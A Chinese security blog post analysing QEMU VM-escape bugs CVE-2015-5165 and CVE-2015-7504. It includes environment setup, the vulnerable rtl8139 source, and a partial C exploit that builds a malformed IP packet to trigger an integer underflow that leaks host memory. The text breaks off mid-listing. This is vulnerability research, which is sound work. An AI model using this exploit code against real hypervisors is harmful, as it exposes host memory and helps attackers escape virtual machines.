MozhuCY's blog.

CVE-2015-7504 CVE-2015-5165QEMU虚拟机逃逸漏洞分析

字数统计: 6.7k阅读时长: 37 min
1970/01/01 Share

QEMU

  • QEMU是一套模拟处理器,在Linux平台上使用广泛,一般虚拟机的漏洞分为两大类,DoS和逃逸,其中逃逸的漏洞威胁最大,但是挖掘难度也很大.
  • 漏洞多出现于IO部分的模拟,因为交互需要许多长度未定的数据,所以在数据处理的代码中,往往会出现一些类似于溢出的漏洞,一般通过这些溢出,就能达到使虚拟机crash的目的

分析目的

  • 这里想要通过已经给出POC的漏洞,以及qemu开源的优势来熟悉虚拟机漏洞的成因以及原理,方便以后对于不同种类虚拟机的漏洞挖掘

环境搭建

  • 卡在这里好久,一直是VNC server running on 127.0.0.1:5900,缺少SDL库,一开始按照网上的教程apt安装了一下,但是还是会出现SDL support no,后来发现还有另一个高版本的SDL库,安装之后重新编译就搞定了.
  • qemu源码编译没什么问题了,因为是下的压缩包,不知道为什么代码被改了一点,直接checkout到漏洞分支不太行,先add commit再checkout
  • ubuntu换了阿里源,一些依赖解决的还好,然后顺利编译好有漏洞版本的qemu,注意漏洞在pcnet网卡里,在checkout后备份一份源码
  • 然后需要一个优秀的qcow2镜像文件,直接使用iso生成qcow2太麻烦了,还好qemu-img支持vmdk格式虚拟机到qemu虚拟机的转换,直接用vmware给的vmware-vdiskmanager.exe进行转换vmware-vdiskmanager.exe -r "D:\vm\Ubuntu 64 位.vmdk" -t 0 "D:\ubuntu.vmdk,将vmdk合并以后,放到虚拟机里,然后qemu-img,qemu-img convert -f vmdk -O qcow2 input.vmdk output.qcow2
  • 然后就需要启动了,这里要指定两个网卡,由于漏洞分别处于pcnet(CVE-2015-7504)与rtl8139(CVE-2015-5165),若需要加快qemu,则需要加上-enable-kvm,注意这个enable kvm需要虚拟机对kvm的支持,在vmware编辑开启虚拟化即可
1
2
3
4
./qemu-system-x86_64 -enable-kvm -m 2048 \
-netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
-netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
-drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback
  • 启动成功

qemu调试方法

  • gdb qemu-system-x86-x start.sh
1
2
3
4
5
set args -enable-kvm -m 2048 -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -drive file=/home/mozhucy/Desktop/qemu-exp.qcow2,format=qcow2,if=ide,cache=writeback

break hw/net/rtl8139.c:2173

r

网络配置

有的时候需要把exp传到虚拟机中,但是最近几次的调试过程中,发生了一些问题.qemu中的网络与外部不通,也就是ping不同10.0.2.2 ifconfig -a后,发现另外一个网卡变成了ens33,还需要把这个改回eth0,方法如下:

vim /etc/default/grub 将GRUB_CMDLINE_LINUX=””引号内容替换成net.ifnames=0 biosdevname=0

然后grub-mkconfig -o /boot/grub/grub.cfg

然后编辑/etc/network/interface 将ens33改成eth0,然后重启虚拟机,重启.

漏洞分析

cve-2015-5165

这是一个虚拟机网卡出现的漏洞,漏洞出现在rtl8139网卡的模拟中,在函数static int rtl8139_cplus_transmit_one(RTL8139State *s)中,在传输TCP包的时候,对于协议解析的过程中,存在一个整形溢出,可以导致leak,详情漏洞如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
static int rtl8139_cplus_transmit_one(RTL8139State *s)
{
...

uint8_t *saved_buffer = s->cplus_txbuffer;
int saved_size = s->cplus_txbuffer_offset;
int saved_buffer_len = s->cplus_txbuffer_len;

...
struct ip_header *ip = NULL;
int hlen = 0;
uint8_t ip_protocol = 0;
uint16_t ip_data_len = 0;

uint8_t *eth_payload_data = NULL;
size_t eth_payload_len = 0;

...

eth_payload_data = saved_buffer + ETH_HLEN;
eth_payload_len = saved_size - ETH_HLEN;

...

ip = (struct ip_header*)eth_payload_data;

if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
DPRINTF("+++ C+ mode packet has bad IP version %d "
"expected %d\n", IP_HEADER_VERSION(ip),
IP_HEADER_VERSION_4);
goto skip_offload;
}

hlen = IP_HDR_GET_LEN(ip);
if (hlen < sizeof(struct ip_header) || hlen > eth_payload_len) {
goto skip_offload;
}

ip_protocol = ip->ip_p;

ip_data_len = be16_to_cpu(ip->ip_len);
if (ip_data_len < hlen || ip_data_len > eth_payload_len) {
goto skip_offload;
}
ip_data_len -= hlen;

....


}

在rtl8139_cplus_transmit_one中,函数会解析txbuffer中的网络数据包,在解析ip协议的时候,存在这样的一个计算ip_data_len -= hlen 其中ip_data_len和hlen分别是ip_header中的两个可控数据

1
2
3
4
5
6
7
8
9
10
11
struct ip_header {
uint8_t ip_ver_len; /* version and header length */
uint8_t ip_tos; /* type of service */
uint16_t ip_len; /* total length */
uint16_t ip_id; /* identification */
uint16_t ip_off; /* fragment offset field */
uint8_t ip_ttl; /* time to live */
uint8_t ip_p; /* protocol */
uint16_t ip_sum; /* checksum */
uint32_t ip_src, ip_dst; /* source and destination address */
};

也就是ip_ver_len中的len减去ip_len,但是在计算的过程中,函数并没有检测两者的大小,在正常的网络包中,ip_ver_len是一定比ip_data_len小的,因为通常情况下的网络数据包是这样子的.

即ip_len是ip头长度加上tcp头长度加上数据长度,但是在这里,如果我们使得ip_data_len小于hlen,则会发生一个整形溢出,即ip_data_len = 0x13,hlen=0x14的时候,计算后ip_data_len结果为-1,从代码中可以看到ip_data_len的数据类型为uint16_t,即0xffff.

在后续的计算中,ip_data_len又被用来计算tcp包的大小,代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;

....


for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
{
....

if (tcp_send_offset)
{
memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
}

....

int tso_send_size = ETH_HLEN + hlen + tcp_hlen + chunk_size;
DPRINTF("+++ C+ mode TSO transferring packet size "
"%d\n", tso_send_size);
rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
0, (uint8_t *) dot1q_buffer);

/* add transferred count to TCP sequence number */
stl_be_p(&p_tcp_hdr->th_seq,
chunk_size + ldl_be_p(&p_tcp_hdr->th_seq));
++send_count;
}

可以看到这里,ip_data_len又被用来计算tcp_data_len的长度,tcp_data_len计算过程为ip_data_len减去

tcp_hlen,因为tcp头中不存在记录长度的区域,所以tcp的长度计算由ip头计算.然后在memcpy rtl8139_transfer_frame 的时候,会多发送许多个包,然后我们便可以在Rxbuffer中读到这些数据.

也就是说,现在我们需要使用网卡发送一个数据,然后去接收,那么就涉及到了一个操作网卡的问题.这里我们要用端口操作,使用io*() in*()等函数进行操作,在/proc/ioports可以看到:

可以看到c000-c0ff为8139网卡的端口范围,对rtl8139网卡操作的端口编号如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
enum RTL8139_registers {
MAC0 = 0, /* Ethernet hardware address. */
MAR0 = 8, /* Multicast filter. */
TxStatus0 = 0x10,/* Transmit status (Four 32bit registers). C mode only */
/* Dump Tally Conter control register(64bit). C+ mode only */
TxAddr0 = 0x20, /* Tx descriptors (also four 32bit). */
RxBuf = 0x30,
ChipCmd = 0x37,
RxBufPtr = 0x38,
RxBufAddr = 0x3A,
IntrMask = 0x3C,
IntrStatus = 0x3E,
TxConfig = 0x40,
RxConfig = 0x44,
Timer = 0x48, /* A general-purpose counter. */
RxMissed = 0x4C, /* 24 bits valid, write clears. */
Cfg9346 = 0x50,
Config0 = 0x51,
Config1 = 0x52,
FlashReg = 0x54,
MediaStatus = 0x58,
Config3 = 0x59,
Config4 = 0x5A, /* absent on RTL-8139A */
HltClk = 0x5B,
MultiIntr = 0x5C,
PCIRevisionID = 0x5E,
TxSummary = 0x60, /* TSAD register. Transmit Status of All Descriptors*/
BasicModeCtrl = 0x62,
BasicModeStatus = 0x64,
NWayAdvert = 0x66,
NWayLPAR = 0x68,
NWayExpansion = 0x6A,
/* Undocumented registers, but required for proper operation. */
FIFOTMS = 0x70, /* FIFO Control and test. */
CSCR = 0x74, /* Chip Status and Configuration Register. */
PARA78 = 0x78,
PARA7c = 0x7c, /* Magic transceiver parameter register. */
Config5 = 0xD8, /* absent on RTL-8139A */
/* C+ mode */
TxPoll = 0xD9, /* Tell chip to check Tx descriptors for work */
RxMaxSize = 0xDA, /* Max size of an Rx packet (8169 only) */
CpCmd = 0xE0, /* C+ Command register (C+ mode only) */
IntrMitigate = 0xE2, /* rx/tx interrupt mitigation control */
RxRingAddrLO = 0xE4, /* 64-bit start addr of Rx ring */
RxRingAddrHI = 0xE8, /* 64-bit start addr of Rx ring */
TxThresh = 0xEC, /* Early Tx threshold */
};

而io端口操作处理函数如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static void rtl8139_ioport_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
switch (size) {
case 1:
rtl8139_io_writeb(opaque, addr, val);
break;
case 2:
rtl8139_io_writew(opaque, addr, val);
break;
case 4:
rtl8139_io_writel(opaque, addr, val);
break;
}
}

static uint64_t rtl8139_ioport_read(void *opaque, hwaddr addr,
unsigned size)
{
switch (size) {
case 1:
return rtl8139_io_readb(opaque, addr);
case 2:
return rtl8139_io_readw(opaque, addr);
case 4:
return rtl8139_io_readl(opaque, addr);
}

return -1;
}

可以看到读和写各有三种操作.分别是byte word long三种方式.最后做一个分发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
static void rtl8139_io_writeb(void *opaque, uint8_t addr, uint32_t val)
{
RTL8139State *s = opaque;

switch (addr)
{
case MAC0 ... MAC0+4:
s->phys[addr - MAC0] = val;
break;
case MAC0+5:
s->phys[addr - MAC0] = val;
qemu_format_nic_info_str(qemu_get_queue(s->nic), s->phys);
break;
case MAC0+6 ... MAC0+7:
/* reserved */
break;
case MAR0 ... MAR0+7:
s->mult[addr - MAR0] = val;
break;
case ChipCmd:
rtl8139_ChipCmd_write(s, val);
break;
case Cfg9346:
rtl8139_Cfg9346_write(s, val);
break;
case TxConfig: /* windows driver sometimes writes using byte-lenth call */
rtl8139_TxConfig_writeb(s, val);
break;
case Config0:
rtl8139_Config0_write(s, val);
break;
case Config1:
rtl8139_Config1_write(s, val);
break;
case Config3:
rtl8139_Config3_write(s, val);
break;
case Config4:
rtl8139_Config4_write(s, val);
break;
case Config5:
rtl8139_Config5_write(s, val);
break;
case MediaStatus:
/* ignore */
DPRINTF("not implemented write(b) to MediaStatus val=0x%02x\n",
val);
break;

case HltClk:
DPRINTF("HltClk write val=0x%08x\n", val);
if (val == 'R')
{
s->clock_enabled = 1;
}
else if (val == 'H')
{
s->clock_enabled = 0;
}
break;

case TxThresh:
DPRINTF("C+ TxThresh write(b) val=0x%02x\n", val);
s->TxThresh = val;
break;

case TxPoll:
DPRINTF("C+ TxPoll write(b) val=0x%02x\n", val);
if (val & (1 << 7))
{
DPRINTF("C+ TxPoll high priority transmission (not "
"implemented)\n");
//rtl8139_cplus_transmit(s);
}
if (val & (1 << 6))
{
DPRINTF("C+ TxPoll normal priority transmission\n");
rtl8139_cplus_transmit(s);
}

break;

default:
DPRINTF("not implemented write(b) addr=0x%x val=0x%02x\n", addr,
val);
break;
}
}

可以整理出最后的函数调用顺序

1
2
3
4
5
rtl8139_ioport_write
rtl8139_io_writeb
rtl8139_cplus_transmit
rtl8139_cplus_transmit_one
....

exp编写

iopl(3)

调整权限.然后开始按照网卡的路径进行约束.

首先是开头的

1
2
3
4
5
6
7
8
9
10
11
if (!rtl8139_transmitter_enabled(s))
{
DPRINTF("+++ C+ mode: transmitter disabled\n");
return 0;
}

if (!rtl8139_cp_transmitter_enabled(s))
{
DPRINTF("+++ C+ mode: C+ transmitter disabled\n");
return 0 ;
}
1
2
3
4
5
6
7
8
9
static int rtl8139_transmitter_enabled(RTL8139State *s)
{
return s->bChipCmdState & CmdTxEnb;
}

static int rtl8139_cp_transmitter_enabled(RTL8139State *s)
{
return s->CpCmd & CPlusTxEnb;
}

可知要操作RTL8139中的CpCmd端口,以及ChipCmd端口,函数如下(其中out*的选择,可以通过查看io分发函数知道.)

1
2
outb(CmdTxEnb|CmdRxEnb,RTL8139 + ChipCmd);
outw(CPlusTxEnb|CPlusRxEnb,RTL8139 + CpCmd);

紧接着在后面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
PCIDevice *d = PCI_DEVICE(s);
int descriptor = s->currCPlusTxDesc;

dma_addr_t cplus_tx_ring_desc = rtl8139_addr64(s->TxAddr[0], s->TxAddr[1]);

/* Normal priority ring */
cplus_tx_ring_desc += 16 * descriptor;

DPRINTF("+++ C+ mode reading TX descriptor %d from host memory at "
"%08x %08x = 0x"DMA_ADDR_FMT"\n", descriptor, s->TxAddr[1],
s->TxAddr[0], cplus_tx_ring_desc);

uint32_t val, txdw0,txdw1,txbufLO,txbufHI;

pci_dma_read(d, cplus_tx_ring_desc, (uint8_t *)&val, 4);
txdw0 = le32_to_cpu(val);
pci_dma_read(d, cplus_tx_ring_desc+4, (uint8_t *)&val, 4);
txdw1 = le32_to_cpu(val);
pci_dma_read(d, cplus_tx_ring_desc+8, (uint8_t *)&val, 4);
txbufLO = le32_to_cpu(val);
pci_dma_read(d, cplus_tx_ring_desc+12, (uint8_t *)&val, 4);
txbufHI = le32_to_cpu(val);

DPRINTF("+++ C+ mode TX descriptor %d %08x %08x %08x %08x\n", descriptor,
txdw0, txdw1, txbufLO, txbufHI);

可以看到代码从s->TxAddr[0]和s->TxAddr[1]中取出了两个uint32_t,并且合并成cplus_tx_ring_desc,即cplus tx ring description.通过pci_dma_read函数可以看到这个cplus_tx_ring_desc大概可以写成这个样子:

1
2
3
4
5
6
7
struct cplus_tx_ring_desc
{
uint32_t txdw0;
uint32_t txdw1;
uint32_t txbufLO;
uint32_t txbufHI;
}

下面又是要限定一堆标志位,才能到达最后的loop中,最后还需要开启TxLoopBack,这样我们就能收到我们发送的数据包了.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
if (!(txdw0 & CP_TX_OWN))
{
return 0 ;
}

if (txdw0 & CP_TX_FS)
{
s->cplus_txbuffer_offset = 0;
}

int txsize = txdw0 & CP_TX_BUFFER_SIZE_MASK;
dma_addr_t tx_addr = rtl8139_addr64(txbufLO, txbufHI);

if (!s->cplus_txbuffer)
{
s->cplus_txbuffer_len = CP_TX_BUFFER_SIZE;
s->cplus_txbuffer = g_malloc(s->cplus_txbuffer_len);
s->cplus_txbuffer_offset = 0;

DPRINTF("+++ C+ mode transmission buffer allocated space %d\n",
s->cplus_txbuffer_len);
}

....


if (txdw0 & CP_TX_EOR)
{
s->currCPlusTxDesc = 0;
}
else
{
++s->currCPlusTxDesc;
if (s->currCPlusTxDesc >= 64)
s->currCPlusTxDesc = 0;
}

...

if (txdw0 & CP_TX_LS)
{
...

if (txdw0 & (CP_TX_IPCS | CP_TX_UDPCS | CP_TX_TCPCS | CP_TX_LGSEN))
{

....

if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
{

...
for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
{
...
if (tcp_send_offset)
{
memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
}
...
rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
0, (uint8_t *) dot1q_buffer);

...
}
...
}
...

这是第一版本的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
#include <sys/io.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int fd;

#define RTL8139 0xc000

#define ETH_HLEN 14
#define ETH_MTU 1500

#define PAGE_SIZE 0x1000
/* w0 ownership flag */
#define CP_TX_OWN (1<<31)
/* w0 end of ring flag */
#define CP_TX_EOR (1<<30)
/* first segment of received packet flag */
#define CP_TX_FS (1<<29)
/* last segment of received packet flag */
#define CP_TX_LS (1<<28)
/* large send packet flag */
#define CP_TX_LGSEN (1<<27)
/* large send MSS mask, bits 16...25 */
#define CP_TC_LGSEN_MSS_MASK ((1 << 12) - 1)

/* IP checksum offload flag */
#define CP_TX_IPCS (1<<18)
/* UDP checksum offload flag */
#define CP_TX_UDPCS (1<<17)
/* TCP checksum offload flag */
#define CP_TX_TCPCS (1<<16)

/* w0 bits 0...15 : buffer size */
#define CP_TX_BUFFER_SIZE (1<<16)
#define CP_TX_BUFFER_SIZE_MASK (CP_TX_BUFFER_SIZE - 1)
/* w1 add tag flag */
#define CP_TX_TAGC (1<<17)
/* w1 bits 0...15 : VLAN tag (big endian) */
#define CP_TX_VLAN_TAG_MASK ((1<<16) - 1)
/* w2 low 32bit of Rx buffer ptr */
/* w3 high 32bit of Rx buffer ptr */

/* set after transmission */
/* FIFO underrun flag */
#define CP_TX_STATUS_UNF (1<<25)
/* transmit error summary flag, valid if set any of three below */
#define CP_TX_STATUS_TES (1<<23)
/* out-of-window collision flag */
#define CP_TX_STATUS_OWC (1<<22)
/* link failure flag */
#define CP_TX_STATUS_LNKF (1<<21)
/* excessive collisions flag */
#define CP_TX_STATUS_EXC (1<<20)

#define CP_RX_EOR (1<<30)
#define CP_RX_OWN (1<<31)

#define CP_RX_BUFFER_SIZE_MASK ((1<<13) - 1)
#define USHRT_MAX 65535
enum RTL_8139_tx_config_bits {
TxLoopBack = (1 << 18) | (1 << 17), /* enable loopback test mode */
/*...*/
};

enum RTL_8139_rx_mode_bits {
AcceptErr = 0x20,
AcceptRunt = 0x10,
AcceptBroadcast = 0x08,
AcceptMulticast = 0x04,
AcceptMyPhys = 0x02,
AcceptAllPhys = 0x01,
Wrap = 0x80,
MxDMA256 = 0x400,
RbLen64 = 0x1800,
RxFTh512 = 0xa000,
};
enum RTL8139_registers {
MAC0 = 0, /* Ethernet hardware address. */
MAR0 = 8, /* Multicast filter. */
TxStatus0 = 0x10,/* Transmit status (Four 32bit registers). C mode only */
/* Dump Tally Conter control register(64bit). C+ mode only */
TxAddr0 = 0x20, /* Tx descriptors (also four 32bit). */
RxBuf = 0x30,
ChipCmd = 0x37,
RxBufPtr = 0x38,
RxBufAddr = 0x3A,
IntrMask = 0x3C,
IntrStatus = 0x3E,
TxConfig = 0x40,
RxConfig = 0x44,
Timer = 0x48, /* A general-purpose counter. */
RxMissed = 0x4C, /* 24 bits valid, write clears. */
Cfg9346 = 0x50,
Config0 = 0x51,
Config1 = 0x52,
FlashReg = 0x54,
MediaStatus = 0x58,
Config3 = 0x59,
Config4 = 0x5A, /* absent on RTL-8139A */
HltClk = 0x5B,
MultiIntr = 0x5C,
PCIRevisionID = 0x5E,
TxSummary = 0x60, /* TSAD register. Transmit Status of All Descriptors*/
BasicModeCtrl = 0x62,
BasicModeStatus = 0x64,
NWayAdvert = 0x66,
NWayLPAR = 0x68,
NWayExpansion = 0x6A,
/* Undocumented registers, but required for proper operation. */
FIFOTMS = 0x70, /* FIFO Control and test. */
CSCR = 0x74, /* Chip Status and Configuration Register. */
PARA78 = 0x78,
PARA7c = 0x7c, /* Magic transceiver parameter register. */
Config5 = 0xD8, /* absent on RTL-8139A */
/* C+ mode */
TxPoll = 0xD9, /* Tell chip to check Tx descriptors for work */
RxMaxSize = 0xDA, /* Max size of an Rx packet (8169 only) */
CpCmd = 0xE0, /* C+ Command register (C+ mode only) */
IntrMitigate = 0xE2, /* rx/tx interrupt mitigation control */
RxRingAddrLO = 0xE4, /* 64-bit start addr of Rx ring */
RxRingAddrHI = 0xE8, /* 64-bit start addr of Rx ring */
TxThresh = 0xEC, /* Early Tx threshold */
};

enum ChipCmdBits {
CmdReset = 0x10,
CmdRxEnb = 0x08,
CmdTxEnb = 0x04,
RxBufEmpty = 0x01,
};

/* C+ mode */
enum CplusCmdBits {
CPlusRxVLAN = 0x0040, /* enable receive VLAN detagging */
CPlusRxChkSum = 0x0020, /* enable receive checksum offloading */
CPlusRxEnb = 0x0002,
CPlusTxEnb = 0x0001,
};

struct cplus_desc
{
uint32_t txdw0;
uint32_t txdw1;
uint32_t txbufLO;
uint32_t txbufHI;
};
static uint8_t rtl8139_packet [] = {
0x52, 0x54, 0x00, 0x12, 0x34, 0x56, 0x52, 0x54, 0x00, 0x12, 0x34,
0x56, 0x08, 0x00, 0x45, 0x00, 0x00, 0x13, 0xde, 0xad, 0x40, 0x00,
0x40, 0x06, 0xde, 0xad, 0xc0, 0x08, 0x01, 0x01, 0xc0, 0xa8, 0x01,
0x02, 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe, 0xca, 0xfe,
0xba, 0xbe, 0x50, 0x10, 0xde, 0xad, 0xde, 0xad, 0x00, 0x00
};

uint32_t v2p(void * addr)
{
uint32_t index = (uint64_t)addr / PAGE_SIZE;
lseek(fd,index * 8,SEEK_SET);
uint64_t num = 0;
read(fd,&num,8);
return ((num & (((uint64_t)1 << 55) - 1)) << 12) + (uint64_t)addr % PAGE_SIZE;

}

void cfgtx(struct cplus_desc * addr,char * buf)
{
addr->txdw0 |= CP_TX_OWN|CP_TX_EOR|CP_TX_LS|CP_TX_IPCS|CP_TX_LGSEN;
addr->txdw0 += ETH_MTU + ETH_HLEN;
addr->txbufLO = v2p(buf);
uint32_t paddr = v2p(addr);
outl(paddr,RTL8139 + TxAddr0);
outl(0,RTL8139 + TxAddr0 + 4);
}
void cfgrx()
{
return;
}

void send(void * buf,void * data,int len)
{
memcpy(buf, data, len);
outb((1 << 6), RTL8139+ TxPoll);
}

int main()
{
fd = open("/proc/self/pagemap",O_RDONLY);
iopl(3);
outb(CmdTxEnb|CmdRxEnb,RTL8139 + ChipCmd);
outw(CPlusTxEnb|CPlusRxEnb,RTL8139 + CpCmd);
outl(TxLoopBack, RTL8139 + TxConfig);
outl(AcceptMyPhys, RTL8139 + RxConfig);

struct cplus_desc * addr = malloc(sizeof(struct cplus_desc));
memset(addr,0,sizeof(struct cplus_desc));

void * tx_buf = malloc(ETH_HLEN + ETH_MTU);
memset(tx_buf,0,ETH_HLEN + ETH_MTU);

cfgtx(addr,tx_buf);


send(tx_buf, rtl8139_packet,sizeof(rtl8139_packet));
sleep(1);
return 0;

}

还差一个cfgrx()函数,也就是接受函数.开启了loopback后,会调用rtl8139_do_receive函数,这里就是关于rx的初始化了,查看源码,可以总结成如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
static ssize_t rtl8139_do_receive(NetClientState *nc, const uint8_t *buf, size_t size_, int do_interrupt)
{
RTL8139State *s = qemu_get_nic_opaque(nc);
PCIDevice *d = PCI_DEVICE(s);

....

if (!rtl8139_receiver_enabled(s))
{
DPRINTF("receiver disabled ================\n");
return -1;
}

/* XXX: check this */
if (s->RxConfig & AcceptAllPhys) {
/* promiscuous: receive all */
DPRINTF(">>> packet received in promiscuous mode\n");

} else {
if (!memcmp(buf, broadcast_macaddr, 6)) {
/* broadcast address */
if (!(s->RxConfig & AcceptBroadcast))
{
DPRINTF(">>> broadcast packet rejected\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

packet_header |= RxBroadcast;

DPRINTF(">>> broadcast packet received\n");

/* update tally counter */
++s->tally_counters.RxOkBrd;

} else if (buf[0] & 0x01) {
/* multicast */
if (!(s->RxConfig & AcceptMulticast))
{
DPRINTF(">>> multicast packet rejected\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

int mcast_idx = net_crc32(buf, ETH_ALEN) >> 26;

if (!(s->mult[mcast_idx >> 3] & (1 << (mcast_idx & 7))))
{
DPRINTF(">>> multicast address mismatch\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

packet_header |= RxMulticast;

DPRINTF(">>> multicast packet received\n");

/* update tally counter */
++s->tally_counters.RxOkMul;

} else if (s->phys[0] == buf[0] &&
s->phys[1] == buf[1] &&
s->phys[2] == buf[2] &&
s->phys[3] == buf[3] &&
s->phys[4] == buf[4] &&
s->phys[5] == buf[5]) {
/* match */
if (!(s->RxConfig & AcceptMyPhys))
{
DPRINTF(">>> rejecting physical address matching packet\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

packet_header |= RxPhysical;

DPRINTF(">>> physical address matching packet received\n");

/* update tally counter */
++s->tally_counters.RxOkPhy;

} else {

DPRINTF(">>> unknown packet\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}
}

/* if too small buffer, then expand it
* Include some tailroom in case a vlan tag is later removed. */
if (size < MIN_BUF_SIZE + VLAN_HLEN) {
memcpy(buf1, buf, size);
memset(buf1 + size, 0, MIN_BUF_SIZE + VLAN_HLEN - size);
buf = buf1;
if (size < MIN_BUF_SIZE) {
size = MIN_BUF_SIZE;
}
}

if (rtl8139_cp_receiver_enabled(s))
{
if (!rtl8139_cp_rx_valid(s)) {
return size;
}

DPRINTF("in C+ Rx mode ================\n");

/* begin C+ receiver mode */

/* w0 ownership flag */
#define CP_RX_OWN (1<<31)
/* w0 end of ring flag */
#define CP_RX_EOR (1<<30)
/* w0 bits 0...12 : buffer size */
#define CP_RX_BUFFER_SIZE_MASK ((1<<13) - 1)
/* w1 tag available flag */
#define CP_RX_TAVA (1<<16)
/* w1 bits 0...15 : VLAN tag */
#define CP_RX_VLAN_TAG_MASK ((1<<16) - 1)
/* w2 low 32bit of Rx buffer ptr */
/* w3 high 32bit of Rx buffer ptr */

int descriptor = s->currCPlusRxDesc;
dma_addr_t cplus_rx_ring_desc;

cplus_rx_ring_desc = rtl8139_addr64(s->RxRingAddrLO, s->RxRingAddrHI);
cplus_rx_ring_desc += 16 * descriptor;

DPRINTF("+++ C+ mode reading RX descriptor %d from host memory at "
"%08x %08x = "DMA_ADDR_FMT"\n", descriptor, s->RxRingAddrHI,
s->RxRingAddrLO, cplus_rx_ring_desc);

uint32_t val, rxdw0,rxdw1,rxbufLO,rxbufHI;

pci_dma_read(d, cplus_rx_ring_desc, &val, 4);
rxdw0 = le32_to_cpu(val);
pci_dma_read(d, cplus_rx_ring_desc+4, &val, 4);
rxdw1 = le32_to_cpu(val);
pci_dma_read(d, cplus_rx_ring_desc+8, &val, 4);
rxbufLO = le32_to_cpu(val);
pci_dma_read(d, cplus_rx_ring_desc+12, &val, 4);
rxbufHI = le32_to_cpu(val);

DPRINTF("+++ C+ mode RX descriptor %d %08x %08x %08x %08x\n",
descriptor, rxdw0, rxdw1, rxbufLO, rxbufHI);

if (!(rxdw0 & CP_RX_OWN))
{
DPRINTF("C+ Rx mode : descriptor %d is owned by host\n",
descriptor);

s->IntrStatus |= RxOverflow;
++s->RxMissed;

/* update tally counter */
